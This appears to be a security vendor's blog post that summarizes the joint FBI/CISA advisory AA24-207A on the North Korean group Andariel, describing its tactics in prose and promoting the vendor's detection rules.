Andariel Attack Detection: FBA, CISA, and Partners Warn of an Increasing Global Cyber-Espionage Campaign Linked to the North Korean State-Sponsored Group
Table of contents:
The FBI, CISA, and leading cybersecurity authorities have issued a warning over growing North Korean cyber-espionage operations linked to the nation-backed hacking group tracked as Andariel. The group’s cyber-espionage activity involves the collection of critical data and intellectual property, thereby advancing the regime’s military and nuclear objectives and aspirations.
Detecting Andariel Attacks Described in CISA AA24-207A Advisory
Since geopolitical tensions have been intensifying globally, state-sponsored hacking collectives have been on the rise in recent years. This trend poses a growing menace for cyber defenders due to the increasing scope and sophistication of attackers’ toolkits. North Korean APT groups remain among the most active collectives in Q1 2024, sharing the top spot with Chinese, Iranian, and Russian actors.
The latest cyber-espionage activity covered in AA24-207A CISA Advisory urges cybersecurity practitioners to enhance their defense against Andariel (aka Onyx Sleet) currently going after sensitive information related to defense, nuclear, and engineering assets worldwide. SOC Prime Platform for collective cyber defense offers a collection of dedicated Sigma rules to identify related malicious activity paired with advanced threat detection & hunting solutions to smooth out threat investigation.
Just hit the Explore Detections button below and immediately drill down to a tailored detection stack to spot the latest cyber-espionage campaign by Andariel APT. All the rules are compatible with 30+ SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, rules are enriched with extensive metadata, including threat intel references, attack timelines, and recommendations.
Cyber defenders seeking more rules to address Andariel’s TTPs might search Threat Detection Marketplace using a custom “Andariel” tag or simply follow this link to access a broader collection of rules associated with the group’s malicious activity.
North Korean Global Cyber-Espionage Attack Analysis Covered in the AA24-207A Alert
On July 25, 2024, the FBI, CISA, and authoring partners issued a novel joint cybersecurity advisory AA24-207A notifying defenders of the increasing risks related to the growing cyber-espionage activity of the nefarious North Korean state-sponsored group. Andariel aka Onyx Sleet (PLUTONIUM, DarkSeoul, and Stonefly/Clasiopa) mainly sets its eyes on defense, aerospace, nuclear, and engineering entities worldwide to collect sensitive and technical information, furthering the regime’s military and nuclear programs and objectives. The group, which has been active in the cyber threat arena since at least 2009, is believed to have evolved from carrying out destructive attacks against U.S. and South Korean organizations to engaging in targeted cyber-espionage and ransomware operations. Defenders consider the group’s ongoing cyber-espionage activity a persistent threat to diverse global industry sectors. Moreover, attackers linked to the Democratic People’s Republic of Korea (DPRK)’s RGB 3rd Bureau finance their offensive operations via ransomware attacks on U.S. healthcare organizations.
Andariel actors gain initial access by weaponizing known flaws, including the Log4Shell vulnerability, to deploy a web shell and access sensitive information and applications. They use standard system discovery and enumeration techniques, establish persistence via scheduled tasks, and elevate privileges with tools like Mimikatz. Adversaries deploy custom malware implants, RATs, and open-source tools for execution, lateral movement, and data exfiltration. The custom tools and malware leveraged by Andariel possess sophisticated capabilities, such as executing arbitrary commands, keylogging, taking screenshots, listing files and directories, stealing browser history, and uploading content to C2 nodes, which enables adversaries to maintain access to the compromised system, with each implant assigned a specific C2 node.
Adversaries are also skilled at employing native tools and processes on systems, a tactic known as LOTL. They leverage the Windows command line, PowerShell, WMIC, and Linux bash for system, network, and account enumeration. Additionally, Andariel conducts phishing campaigns using malicious attachments, such as LNK files or HTA script files that often go within zip archives.
They also rely on tunneling tools like 3Proxy, PLINK, and Stunnel, along with custom proxy tunneling utilities, to route traffic over various protocols from within a network to a C2 server. This tunneling allows hackers to conduct C2 operations despite network configurations that would usually be restrictive.
As for data exfiltration, Andariel commonly relies on cloud storage or servers separate from their primary C2. They have been observed logging into their cloud storage accounts directly from victim networks and using tools like PuTTY and WinSCP to transfer data to North Korea-controlled servers via FTP and other protocols. Additionally, they stage files for exfiltration on the compromised machines.
Critical infrastructure organizations are strongly recommended to stay vigilant to North Korean state-sponsored cyber-espionage attacks. To mitigate the risks of Andariel’s increasing malicious activity, defenders encourage global organizations to promptly apply patches for known vulnerabilities, secure web servers against web shells, monitor endpoints for malicious activities, and enhance authentication and remote access protections.
The persistent cyber-espionage attacks attributed to Andariel, the notorious North Korean state-sponsored group, are increasingly endangering critical infrastructure organizations globally. To help security teams timely identify potential intrusions and minimize the risk of data breaches, rely on SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting, and Detection Stack Validation, which equips organizations with an all-in-one solution for collective cyber defense.